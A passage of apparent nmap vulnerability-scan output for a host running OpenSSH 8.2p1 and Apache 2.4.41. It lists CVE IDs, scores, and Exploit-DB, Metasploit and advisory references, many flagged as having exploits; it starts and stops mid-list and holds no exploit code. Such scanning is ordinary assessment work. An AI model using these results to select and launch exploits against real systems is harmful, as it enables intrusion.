[8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database [8383] OpenSSH off-by-one error in channel code [7647] OpenSSH UseLogin option arbitrary code execution [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges [7179] OpenSSH source IP access control bypass [6757] OpenSSH &quot [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files [6084] OpenSSH 2.3.1 allows remote users to bypass authentication [5517] OpenSSH allows unauthorized access to resources [4646] OpenSSH UseLogin option allows remote users to execute commands as root Exploit-DB - https://www.exploit-db.com: [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2) [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1) [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth) [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh) [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool OpenVAS (Nessus) - http://www.openvas.org: [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability [900179] OpenSSH CBC Mode Information Disclosure Vulnerability [881183] CentOS Update for openssh CESA-2012:0884 centos6 [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386 [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386 [870763] RedHat Update for openssh RHSA-2012:0884-04 [870129] RedHat Update for openssh RHSA-2008:0855-01 [861813] Fedora Update for openssh FEDORA-2010-5429 [861319] Fedora Update for openssh FEDORA-2007-395 [861170] Fedora Update for openssh FEDORA-2007-394 [861012] Fedora Update for openssh FEDORA-2007-715 [840345] Ubuntu Update for openssh vulnerability USN-597-1 [840300] Ubuntu Update for openssh update USN-612-5 [840271] Ubuntu Update for openssh vulnerability USN-612-2 [840268] Ubuntu Update for openssh update USN-612-7 [840259] Ubuntu Update for openssh vulnerabilities USN-649-1 [840214] Ubuntu Update for openssh vulnerability USN-566-1 [831074] Mandriva Update for openssh MDVA-2010:162 (openssh) [830929] Mandriva Update for openssh MDVA-2010:090 (openssh) [830807] Mandriva Update for openssh MDVA-2010:026 (openssh) [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh) [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh) [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt) [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh) [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability [100584] OpenSSH X Connections Session Hijacking Vulnerability [100153] OpenSSH CBC Mode Information Disclosure Vulnerability [66170] CentOS Security Advisory CESA-2009:1470 (openssh) [65987] SLES10: Security update for OpenSSH [65819] SLES10: Security update for OpenSSH [65514] SLES9: Security update for OpenSSH [65513] SLES9: Security update for OpenSSH [65334] SLES9: Security update for OpenSSH [65248] SLES9: Security update for OpenSSH [65218] SLES9: Security update for OpenSSH [65169] SLES9: Security update for openssh,openssh-askpass [65126] SLES9: Security update for OpenSSH [65019] SLES9: Security update for OpenSSH [65015] SLES9: Security update for OpenSSH [64931] CentOS Security Advisory CESA-2009:1287 (openssh) [61639] Debian Security Advisory DSA 1638-1 (openssh) [61030] Debian Security Advisory DSA 1576-2 (openssh) [61029] Debian Security Advisory DSA 1576-1 (openssh) [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc) [60803] Gentoo Security Advisory GLSA 200804-03 (openssh) [60667] Slackware Advisory SSA:2008-095-01 openssh [59014] Slackware Advisory SSA:2007-255-01 openssh [58741] Gentoo Security Advisory GLSA 200711-02 (openssh) [57919] Gentoo Security Advisory GLSA 200611-06 (openssh) [57895] Gentoo Security Advisory GLSA 200609-17 (openssh) [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6)) [57492] Slackware Advisory SSA:2006-272-02 openssh [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5) [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc) [57470] FreeBSD Ports: openssh [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc) [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH) [56294] Slackware Advisory SSA:2006-045-06 openssh [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again [53788] Debian Security Advisory DSA 025-1 (openssh) [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc) [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc) [11343] OpenSSH Client Unauthorized Remote Forwarding [10954] OpenSSH AFS/Kerberos ticket/token passing [10883] OpenSSH Channel Code Off by 1 [10823] OpenSSH UseLogin Environment Variables SecurityTracker - https://www.securitytracker.com: [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies OSVDB - http://www.osvdb.org: [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure [70873] OpenSSH Legacy Certificates Stack Memory Disclosure [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation [56921] OpenSSH Unspecified Remote Compromise [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution [43745] OpenSSH X11 Forwarding Local Session Hijacking [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection [37315] pam_usb OpenSSH Authentication Unspecified Issue [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS [34601] OPIE w/ OpenSSH Account Enumeration [34600] OpenSSH S/KEY Authentication Account Enumeration [32721] OpenSSH Username Password Complexity Account Enumeration [30232] OpenSSH Privilege Separation Monitor Weakness [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution [29152] OpenSSH Identical Block Packet DoS [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS [22692] OpenSSH scp Command Line Filename Processing Command Injection [20216] OpenSSH with KerberosV Remote Authentication Bypass [19142] OpenSSH Multiple X11 Channel Forwarding Leaks [19141] OpenSSH GSSAPIAuthentication Credential Escalation [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass [16567] OpenSSH Privilege Separation LoginGraceTime DoS [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness [9550] OpenSSH scp Traversal Arbitrary File Overwrite [6601] OpenSSH *realloc() Unspecified Memory Errors [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow [6073] OpenSSH on FreeBSD libutil Arbitrary File Read [6072] OpenSSH PAM Conversation Function Stack Modification [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass [5408] OpenSSH echo simulation Information Disclosure [5113] OpenSSH NIS YP Netgroups Authentication Bypass [4536] OpenSSH Portable AIX linker Privilege Escalation [3938] OpenSSL and OpenSSH /dev/random Check Failure [3456] OpenSSH buffer_append_space() Heap Corruption [2557] OpenSSH Multiple Buffer Management Multiple Overflows [2140] OpenSSH w/ PAM Username Validity Timing Attack [2112] OpenSSH Reverse DNS Lookup Bypass [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness [1853] OpenSSH Symbolic Link 'cookies' File Removal [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow [730] OpenSSH Channel Code Off by One Remote Privilege Escalation [688] OpenSSH UseLogin Environment Variable Local Command Execution [642] OpenSSH Multiple Key Type ACL Bypass [504] OpenSSH SSHv2 Public Key Authentication Bypass [341] OpenSSH UseLogin Local Privilege Escalation
	vulners	cpe:/a:openbsd:openssh:8.2p1: CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778 C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 EXPLOIT 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 EXPLOIT CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062 MSF:ILITIES/GENTOO-LINUX-CVE-2021-28041/ 4.6 https://vulners.com/metasploit/MSF:ILITIES/GENTOO-LINUX-CVE-2021-28041/ EXPLOIT CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041 CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617 MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ EXPLOIT MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ EXPLOIT CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012 CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
80	tcp	open	http	syn-ack	Apache httpd	2.4.41	(Ubuntu)
	http-stored-xss	Couldn't find any stored XSS vulnerabilities.
	vulners	cpe:/a:apache:http_server:2.4.41: E899CC4B-A3FD-5288-BB62-A4201F93FDCC 10.0 https://vulners.com/githubexploit/E899CC4B-A3FD-5288-BB62-A4201F93FDCC EXPLOIT MSF:ILITIES/UBUNTU-CVE-2020-11984/ 7.5 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2020-11984/ EXPLOIT MSF:ILITIES/REDHAT_LINUX-CVE-2020-11984/ 7.5 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2020-11984/ EXPLOIT MSF:ILITIES/ORACLE_LINUX-CVE-2020-11984/ 7.5 https://vulners.com/metasploit/MSF:ILITIES/ORACLE_LINUX-CVE-2020-11984/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-11984/ 7.5 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-11984/ EXPLOIT MSF:ILITIES/FREEBSD-CVE-2020-11984/ 7.5 https://vulners.com/metasploit/MSF:ILITIES/FREEBSD-CVE-2020-11984/ EXPLOIT MSF:ILITIES/APACHE-HTTPD-CVE-2020-11984/ 7.5 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-11984/ EXPLOIT CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813 CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943 CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720 CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790 CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275 CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691 CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 EXPLOIT FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 EXPLOIT CVE-2022-22721 6.8 https://vulners.com/cve/CVE-2022-22721 CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438 CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 EXPLOIT 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 EXPLOIT 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B EXPLOIT CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615 CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224 CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927 MSF:ILITIES/REDHAT_LINUX-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2020-9490/ EXPLOIT MSF:ILITIES/ORACLE_LINUX-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE_LINUX-CVE-2020-9490/ EXPLOIT MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-9490/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-9490/ EXPLOIT MSF:ILITIES/FREEBSD-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/FREEBSD-CVE-2020-9490/ EXPLOIT MSF:ILITIES/CENTOS_LINUX-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2020-9490/ EXPLOIT MSF:ILITIES/APACHE-HTTPD-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-9490/ EXPLOIT MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2020-9490/ EXPLOIT CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556 CVE-2022-30522 5.0 https://vulners.com/cve/CVE-2022-30522 CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404 CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614 CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377 CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719 CVE-2021-36160 5.0 https://vulners.com/cve/CVE-2021-36160 CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798 CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193 CVE-2021-30641 5.0 https://vulners.com/cve/CVE-2021-30641 CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690 CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490 CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934 CVE-2020-13950 5.0 https://vulners.com/cve/CVE-2020-13950 CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567 MSF:ILITIES/REDHAT_LINUX-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2020-11993/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-11993/ EXPLOIT MSF:ILITIES/CENTOS_LINUX-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2020-11993/ EXPLOIT MSF:ILITIES/APACHE-HTTPD-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-11993/ EXPLOIT MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2020-11993/ EXPLOIT CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 EXPLOIT
	http-server-header	Apache/2.4.41 (Ubuntu)
	http-csrf	Couldn't find any CSRF vulnerabilities.
	http-dombased-xss	Couldn't find any DOM based XSS.
	vulscan	VulDB - https://vuldb.com: [152665] Apache HTTP Server up to 2.4.41 mod_proxy_ftp Uninitialized Resource [152664] Apache HTTP Server up to 2.4.41 mod_rewrite Redirect [176770] Apache HTTP Server up to 2.4.46 on Windows denial of service [176769] Apache HTTP Server up to 2.4.46 MergeSlashes unknown vulnerability [176768] Apache HTTP Server up to 2.4.46 mod_session heap-based overflow [176767] Apache HTTP Server up to 2.4.46 mod_session null pointer dereference [176766] Apache HTTP Server up to 2.4.46 mod_proxy_http null pointer dereference [176765] Apache HTTP Server up to 2.4.46 mod_proxy_wstunnel improper authentication [176764] Apache HTTP Server up to 2.4.46 mod_auth_digest stack-based overflow [159399] Apache HTTP Server up to 2.4.43 HTTP2 Request privilege escalation [159376] Apache HTTP Server up to 2.4.43 mod_http2 privilege escalation [159374] Apache HTTP Server up to 2.4.44 mod_proxy_uwsgi memory corruption [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c privilege escalation MITRE CVE - https://cve.mitre.org: [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string. [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules. [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors. [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client. [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body. [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list. [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors. [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies. [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl. [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow. SecurityFocus - https://www.securityfocus.com/bid/: [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability [15177] PHP Apache 2 Local Denial of Service Vulnerability [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability [5816] Apache 2 mod_dav Denial Of Service Vulnerability [5486] Apache 2.0 CGI Path Disclosure Vulnerability [5485] Apache 2.0 Path Disclosure Vulnerability [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [75211] Debian GNU/Linux apache 2 cross-site scripting Exploit-DB - https://www.exploit-db.com: [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability [27915] Apache James 2.2 SMTP Denial of Service Vulnerability [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2) [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1) [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability [21719] Apache 2.0 Path Disclosure Vulnerability [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities [17691] Apache Struts < 2.2.0 - Remote Command Execution [15319] Apache 2.2 (Windows) Local Denial of Service [14617] Apache JackRabbit 2.0.0 webapp XPath Injection [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32) [3996] Apache 2.0.58 mod_rewrite Remote 